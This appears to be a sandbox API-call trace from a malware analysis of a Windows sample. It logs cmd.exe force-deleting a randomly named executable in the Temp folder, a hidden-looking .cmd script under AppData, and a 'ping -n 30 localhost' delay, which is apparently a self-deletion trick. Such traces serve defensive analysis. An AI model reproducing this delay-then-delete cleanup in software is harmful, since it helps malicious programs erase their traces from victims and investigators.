_vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x12ed74 | out: _Buffer="\r\n") returned 2 [0126.855] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.855] GetFileType (hFile=0x7) returned 0x2 [0126.855] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0126.855] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12ed34 | out: lpMode=0x12ed34) returned 1 [0126.856] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.856] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x12ed60, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x12ed60*=0x2) returned 1 [0126.856] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0126.856] _vsnwprintf (in: _Buffer=0x4a9e5e40, 
_BufferCount=0x3fe, _Format="%s", _ArgList=0x12ed70 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0126.856] _vsnwprintf (in: _Buffer=0x4a9e5e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x12ed70 | out: _Buffer=">") returned 1 [0126.856] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.856] GetFileType (hFile=0x7) returned 0x2 [0126.856] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0126.856] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12ed38 | out: lpMode=0x12ed38) returned 1 [0126.856] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.856] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9e5e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x12ed64, lpReserved=0x0 | out: lpBuffer=0x4a9e5e40*, lpNumberOfCharsWritten=0x12ed64*=0x19) returned 1 [0126.857] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.857] GetFileType (hFile=0x7) returned 0x2 [0126.857] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0126.857] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12efbc | out: lpMode=0x12efbc) returned 1 [0126.857] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.857] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x19f008*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x12efe8, lpReserved=0x0 | out: lpBuffer=0x19f008*, lpNumberOfCharsWritten=0x12efe8*=0x3) returned 1 [0126.857] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x12eff4 | out: _Buffer=" /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" ") returned 58 [0126.857] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.857] GetFileType (hFile=0x7) returned 0x2 [0126.857] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0126.857] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12efb4 | out: lpMode=0x12efb4) returned 1 [0126.858] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.858] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x3a, lpNumberOfCharsWritten=0x12efe0, lpReserved=0x0 
| out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x12efe0*=0x3a) returned 1 [0126.858] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x12f014 | out: _Buffer="\r\n") returned 2 [0126.858] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.858] GetFileType (hFile=0x7) returned 0x2 [0126.858] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0126.858] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12efd4 | out: lpMode=0x12efd4) returned 1 [0126.858] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.858] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x12f000, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x12f000*=0x2) returned 1 [0126.858] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0126.858] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0126.858] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0126.859] GetConsoleTitleW (in: lpConsoleTitle=0x12eb84, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0126.859] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x12dbfc, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x12dc00, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x12dbfc*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0126.859] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0126.859] _wcsicmp (_String1="w588H5dN.exe", _String2=".") returned 73 [0126.859] _wcsicmp (_String1="w588H5dN.exe", _String2="..") returned 73 [0126.859] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\w588h5dn.exe")) returned 0xffffffff [0126.859] GetLastError () returned 0x2 [0126.859] GetFileAttributesW 
(lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp")) returned 0x2010 [0126.859] _wcsicmp (_String1="w588H5dN.exe", _String2=".") returned 73 [0126.859] _wcsicmp (_String1="w588H5dN.exe", _String2="..") returned 73 [0126.859] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\w588h5dn.exe")) returned 0xffffffff [0126.860] GetLastError () returned 0x2 [0126.860] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe", fInfoLevelId=0x0, lpFindFileData=0x1a0554, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1a0554) returned 0xffffffff [0126.860] GetLastError () returned 0x2 [0126.860] _get_osfhandle (_FileHandle=2) returned 0xb [0126.860] GetFileType (hFile=0xb) returned 0x2 [0126.860] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0126.860] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12e5fc | out: lpMode=0x12e5fc) returned 1 [0126.860] _get_osfhandle (_FileHandle=2) returned 0xb [0126.860] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x12e630 | out: lpConsoleScreenBufferInfo=0x12e630) returned 1 [0126.860] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0126.861] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.861] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0126.861] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.861] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0126.861] _get_osfhandle (_FileHandle=0) returned 0x3 [0126.861] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0126.862] SetConsoleInputExeNameW () returned 0x1 [0126.862] 
GetConsoleOutputCP () returned 0x1b5 [0126.862] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0126.862] SetThreadUILanguage (LangId=0x0) returned 0x409 [0126.862] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\WlLsor5U.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\wllsor5u.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x12efbc, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0126.862] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0126.862] _get_osfhandle (_FileHandle=3) returned 0x54 [0126.862] SetFilePointer (in: hFile=0x54, lDistanceToMove=145, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0126.862] _get_osfhandle (_FileHandle=3) returned 0x54 [0126.862] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0126.862] ReadFile (in: hFile=0x54, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x12efa0, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x12efa0*=0x0, lpOverlapped=0x0) returned 1 [0126.862] GetLastError () returned 0x0 [0126.862] _get_osfhandle (_FileHandle=3) returned 0x54 [0126.863] GetFileType (hFile=0x54) returned 0x1 [0126.863] _get_osfhandle (_FileHandle=3) returned 0x54 [0126.863] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0126.863] _get_osfhandle (_FileHandle=3) returned 0x54 [0126.863] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0126.863] ReadFile (in: hFile=0x54, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x12ef84, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, 
lpNumberOfBytesRead=0x12ef84*=0x0, lpOverlapped=0x0) returned 1 [0126.863] GetLastError () returned 0x0 [0126.863] _get_osfhandle (_FileHandle=3) returned 0x54 [0126.863] GetFileType (hFile=0x54) returned 0x1 [0126.863] _get_osfhandle (_FileHandle=3) returned 0x54 [0126.863] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0126.863] longjmp () [0126.863] _tell (_FileHandle=3) returned 145 [0126.863] _close (_FileHandle=3) returned 0 [0126.863] CmdBatNotification () returned 0x0 [0126.863] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.863] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0126.864] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.864] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0126.864] _get_osfhandle (_FileHandle=0) returned 0x3 [0126.864] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0126.864] SetConsoleInputExeNameW () returned 0x1 [0126.864] GetConsoleOutputCP () returned 0x1b5 [0126.864] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0126.864] SetThreadUILanguage (LangId=0x0) returned 0x409 [0126.864] exit (_Code=0) Process: id = "62" image_name = "ping.exe" filename = "c:\\windows\\system32\\ping.exe" page_root = "0x7ea166c0" os_pid = "0xed0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "59" os_parent_pid = "0xe7c" cmd_line = "ping -n 30 localhost" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" 
[0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8825 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 8826 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 8827 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 8828 start_va = 0x240000 end_va = 0x247fff entry_point = 0x240000 region_type = mapped_file name = "ping.exe" filename = "\\Windows\\System32\\PING.EXE" (normalized: "c:\\windows\\system32\\ping.exe") Region: id = 8829 start_va = 0x250000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 8830 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8831 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 8832 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 8833 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 8834 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 8835 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 8836 start_va = 0x20000 
end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 8837 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8838 start_va = 0x1f0000 end_va = 0x1fffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 8839 start_va = 0x480000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 8840 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 8841 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 8842 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 8843 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 8844 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 8845 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 8846 
start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8847 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 8848 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 8849 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 8850 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 8851 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 8852 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 8853 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 8854 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 8855 start_va = 0xc0000 
end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 8856 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 8857 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 8858 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 8859 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 8860 start_va = 0x1b0000 end_va = 0x1b2fff entry_point = 0x1b0000 region_type = mapped_file name = "ping.exe.mui" filename = "\\Windows\\System32\\en-US\\ping.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\ping.exe.mui") Region: id = 8861 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 8862 start_va = 0x1d0000 end_va = 0x1d0fff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 8863 start_va = 0x290000 end_va = 0x390fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 8864 start_va = 0x580000 end_va = 0x117ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8865 start_va = 0x1180000 end_va = 0x144efff entry_point = 0x1180000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 8866 
start_va = 0x74e10000 end_va = 0x74e4bfff entry_point = 0x74e10000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 8867 start_va = 0x1450000 end_va = 0x155ffff entry_point = 0x0 region_type = private name = "private_0x0000000001450000" filename = "" Region: id = 8868 start_va = 0x74960000 end_va = 0x74964fff entry_point = 0x74960000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 8869 start_va = 0x74e00000 end_va = 0x74e05fff entry_point = 0x74e00000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 8870 start_va = 0x74cd0000 end_va = 0x74d13fff entry_point = 0x74cd0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 8871 start_va = 0x1560000 end_va = 0x168ffff entry_point = 0x0 region_type = private name = "private_0x0000000001560000" filename = "" Region: id = 8872 start_va = 0x3f0000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 8873 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 8874 start_va = 0x704a0000 end_va = 0x704a5fff entry_point = 0x704a0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 8923 start_va = 0x736b0000 end_va = 0x736e7fff entry_point = 0x736b0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 8924 start_va = 0x1450000 end_va = 
0x14affff entry_point = 0x0 region_type = private name = "private_0x0000000001450000" filename = "" Region: id = 8925 start_va = 0x1520000 end_va = 0x155ffff entry_point = 0x0 region_type = private name = "private_0x0000000001520000" filename = "" Region: id = 9040 start_va = 0x16a0000 end_va = 0x16dffff entry_point = 0x0 region_type = private name = "private_0x00000000016a0000" filename = "" Region: id = 9041 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 9152 start_va = 0x15f0000 end_va = 0x162ffff entry_point = 0x0 region_type = private name = "private_0x00000000015f0000" filename = "" Region: id = 9153 start_va = 0x1650000 end_va = 0x168ffff entry_point = 0x0 region_type = private name = "private_0x0000000001650000" filename = "" Region: id = 9154 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Thread: id = 106 os_tid = 0xed4 [0117.777] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28f7ec | out: lpSystemTimeAsFileTime=0x28f7ec*(dwLowDateTime=0x83726d00, dwHighDateTime=0x1d440a9)) [0117.777] GetCurrentProcessId () returned 0xed0 [0117.777] GetCurrentThreadId () returned 0xed4 [0117.777] GetTickCount () returned 0x27eb0 [0117.777] QueryPerformanceCounter (in: lpPerformanceCount=0x28f7e4 | out: lpPerformanceCount=0x28f7e4*=17456595701) returned 1 [0117.777] GetModuleHandleA (lpModuleName=0x0) returned 0x240000 [0117.777] __set_app_type (_Type=0x1) [0117.777] __p__fmode () returned 0x76b331f4 [0117.778] __p__commode () returned 0x76b331fc [0117.778] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x242ae1) returned 0x0 [0117.778] __getmainargs (in: _Argc=0x2450d4, _Argv=0x2450dc, _Env=0x2450d8, _DoWildCard=0, _StartInfo=0x2450e8 | out: _Argc=0x2450d4, _Argv=0x2450dc, _Env=0x2450d8) returned 0 [0117.778] SetThreadUILanguage (LangId=0x0) returned 0x409 [0117.778] 
HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0117.778] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x245440 | out: lpWSAData=0x245440) returned 0 [0117.785] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0x28f27c | out: phkResult=0x28f27c*=0x58) returned 0x0 [0117.785] RegQueryValueExA (in: hKey=0x58, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0x28f270, lpData=0x28f278, lpcbData=0x28f274*=0x4 | out: lpType=0x28f270*=0x0, lpData=0x28f278*=0x0, lpcbData=0x28f274*=0x4) returned 0x2 [0117.785] RegCloseKey (hKey=0x58) returned 0x0 [0117.786] getaddrinfo (in: pNodeName="localhost", pServiceName=0x0, pHints=0x28f244*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x28f26c | out: ppResult=0x28f26c*=0x0) returned 11001 [0117.786] getaddrinfo (in: pNodeName="localhost", pServiceName=0x0, pHints=0x28f244*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x28f26c | out: ppResult=0x28f26c*=0x4a3788*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname="cRh2YWu7", ai_addr=0x4a3850*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), ai_next=0x4a3878*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4a27f0*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0))) returned 0 [0118.364] FreeAddrInfoW (pAddrInfo=0x4a3788*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname="剣㉨坙㝵", ai_addr=0x4a3850*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), ai_next=0x4a3878*(ai_flags=0, ai_family=2, 
ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4a27f0*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0))) [0118.364] Icmp6CreateFile () returned 0x4a8b88 [0118.642] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x4a38c8 [0118.642] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0x4aec00 [0118.643] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x28f76c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0118.643] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2720, dwLanguageId=0x0, lpBuffer=0x28f26c, nSize=0x0, Arguments=0x28f268 | out: lpBuffer="\xf0\x38\x4a") returned 0x19 [0118.643] CharToOemBuffA (in: lpszSrc="\r\nPinging cRh2YWu7 [::1] ", lpszDst=0x4a38f0, cchDstLength=0x19 | out: lpszDst="\r\nPinging cRh2YWu7 [::1] ") returned 1 [0118.643] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0118.644] _write (in: _FileHandle=1, _Buf=0x4a38f0*, _MaxCharCount=0x19 | out: _Buf=0x4a38f0*) returned 25 [0118.644] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0118.644] LocalFree (hMem=0x4a38f0) returned 0x0 [0118.644] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: lpBuffer="\xf0\x38\x4a") returned 0x18 [0118.644] CharToOemBuffA (in: lpszSrc="with 32 bytes of data:\r\n", lpszDst=0x4a38f0, cchDstLength=0x18 | out: lpszDst="with 32 bytes of data:\r\n") returned 1 [0118.644] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0118.644] _write (in: _FileHandle=1, _Buf=0x4a38f0*, _MaxCharCount=0x18 | out: _Buf=0x4a38f0*) returned 24 [0118.644] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0118.644] LocalFree (hMem=0x4a38f0) returned 0x0 [0118.644] SetConsoleCtrlHandler 
